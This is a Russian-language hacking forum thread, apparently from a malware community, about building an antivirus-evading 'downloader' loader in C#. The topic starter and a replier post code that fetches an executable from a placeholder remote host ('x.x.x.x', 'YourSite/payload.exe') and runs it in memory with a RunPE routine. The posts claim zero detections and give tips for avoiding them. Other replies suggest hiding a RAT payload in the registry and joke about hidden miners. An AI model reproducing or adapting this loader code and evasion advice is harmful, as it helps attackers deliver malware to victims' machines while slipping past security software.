Загрузка...

Downloader(Typo loader) with RunPE FUD 0 DETECTS RUNTIME ME TO

Thread in C# created by Lytik_inactive4477619 Oct 9, 2021. 1025 views

Sort
  1. Lytik_inactive4477619
    Who's liked this post (2)
    Lytik_inactive4477619 Topic starter Oct 9, 2021 Banned 23 Sep 7, 2021
    Детекты : https://www.virustotal.com/gui/file...19e2660c900821e526b7599b4dcbc587fae/detection
    (Залил на Вт так как тестовый и напсаный за 15 минут )
    Сам пиздец как такое сделать .
    Суете RunPe любой даже заезжанный ..
    Скачиваете через дефолтные библы от студийки
    У меня получилось примерно вот так

    WebClient webClient = new WebClient();
    webClient.DownloadFile("http://x.x.x.x/test.exe", Environment.GetEnvironmentVariable("Temp") + "\\x.x.x.x.exe");
    Thread.Sleep(8000);
    byte[] payload = File.ReadAllBytes(Environment.GetEnvironmentVariable("Temp") +"\\test.exe");
    string filevar = "x.x.x.x.x";
    RunMax.Run(payload, filevar);

    Все у вас готовы Downloader(Лоадер) с 0 детектами . ПОЖАЛУЙСТА ЕСЛИ ВЫ БУДЕТЕ ИСПОЛЬЗОВАТЬ СБОРКУ ОДНИМ ФАЙЛОМ(DONTET,CODEBOOM,MSBUILD) ЖДИТЕ ДЕТЕКТОВ . ЛИБО СУЙТЕ НОРМ МАНИФЕСТ
    Так же я понимаю , что это настоящий быдлокодинг , без вызова какой то хуйни. НО ЭТО ПРОСТО ПРИМЕР НАПИСАНЫЙ ЗА 15 МИНУТ
     
    Oct 9, 2021
  2. CoderVir
    CoderVir Oct 9, 2021
    Oct 9, 2021
  3. TheWall_inactive2650523
    TheWall_inactive2650523 Oct 9, 2021 Waiting for the worms to come 52 Sep 23, 2019
    Где ссылка на пример? Нахуя нам ссылка на вирус тотал без доказательств что это детект этой программы
     
    Oct 9, 2021
    1. CoderVir
      TheWall_inactive2650523, нет я с ним общался. Он мне в лс рассказывал, что при установке системных манифестов будет такой результат. Понятное дело при динамическом исполнении кода.
      Oct 9, 2021
    2. TheWall_inactive2650523
      @CoderVir, сделал бы загрузку байтов и запуск в памяти средствами winapi был бы и лучше рантайм детект и интереснее
      Oct 9, 2021
    3. View the next comments (2)
  4. Dead__Artis
    Dead__Artis Oct 9, 2021 921 May 30, 2020
    дам вам идею для ратника чтобы криптануть, создаете лоадер RunPe который будет брать код из реестра и создаем ****пер который по пути реестра будет сохранять код то есть массив байтов ****пер будет палиться за то лоадер нет, понимаю примитивно но способ довольно таки рабочий.
    The post was merged to previous Oct 9, 2021
    так на много легче и без загрузки в темп)
    C#

    
using (WebClient wc = new WebClient())
    
            {
    
                try
    
                {
    
                    byte[] buffer = wc.DownloadData("http://YourSite/payload.exe");
    
                    RunMax.Run(buffer, "x.x.x.x");
    

    
                }
    
                catch { }
    
            }
     
    Oct 9, 2021 Edited
    1. View previous comments (3)
    2. Dead__Artis
      Lytik_inactive4477619, самое страшное для юзера в ран пе это системные прерывания хахаха, всегда про них шутил (скрытый майнер)
      Oct 10, 2021
    3. Lytik_inactive4477619 Topic starter
      Dead__Artis, самое страшное для юза если суешь в regAsm и в процах можно просмотреть . Процесс приостановлен xD
      Oct 10, 2021
    4. Dead__Artis
      Oct 11, 2021
  5. mikuzeboka
    mikuzeboka Oct 10, 2021 5 Jan 13, 2021
    Ебанулся, мне этот же код пол года назад выдавал 2-3 детекта , учитывая файлообменник( 2 детекта за счёт кода, если юзать гд с запароленым архивом )
     
    Oct 10, 2021
    1. Lytik_inactive4477619 Topic starter
      mikuzeboka, хуй знает хуй знает 2 день на вт лежит поебать. Как то похуй . Могу скинуть еxe запустишь тестанешь по рантайму X)
      Oct 10, 2021
    2. Lytik_inactive4477619 Topic starter
      mikuzeboka, я вообще архивы не юзаю еще проц ебать .
      Oct 10, 2021
Top
Loading...